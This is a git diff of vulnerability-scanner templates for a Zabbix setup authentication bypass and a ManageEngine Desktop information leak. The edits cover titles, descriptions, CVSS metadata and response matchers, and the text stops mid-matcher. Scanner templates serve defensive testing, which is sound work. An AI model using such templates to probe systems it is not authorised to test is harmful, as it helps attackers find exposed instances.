a/cves/2022/CVE-2022-23134.yaml b/cves/2022/CVE-2022-23134.yaml index b62dd45721..53aca6a04f 100644 --- a/cves/2022/CVE-2022-23134.yaml +++ b/cves/2022/CVE-2022-23134.yaml @@ -1,10 +1,10 @@ id: CVE-2022-23134 info: - name: Zabbix Setup Configuration - Unauthenticated Access + name: Zabbix Setup Configuration Authentication Bypass author: bananabr severity: medium - description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. + description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend. reference: - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage - https://nvd.nist.gov/vuln/detail/CVE-2022-23134 @@ -36,4 +36,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/08 diff --git a/cves/2022/CVE-2022-23779.yaml b/cves/2022/CVE-2022-23779.yaml index 50b3791ebe..ec76791cfd 100644 --- a/cves/2022/CVE-2022-23779.yaml +++ b/cves/2022/CVE-2022-23779.yaml @@ -12,6 +12,11 @@ info: metadata: fofa-query: app="ZOHO-ManageEngine-Desktop" tags: cve,cve2022,zoho,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2022-23779 + cwe-id: CWE-200 requests: - method: GET @@ -31,13 +36,24 @@ requests: - 'text/html' condition: and - - type: dsl - dsl: - - '!contains(location,host)' + - type: word + part: location + words: + - '{{Host}}' + negative: true + + - type: word + words: + - '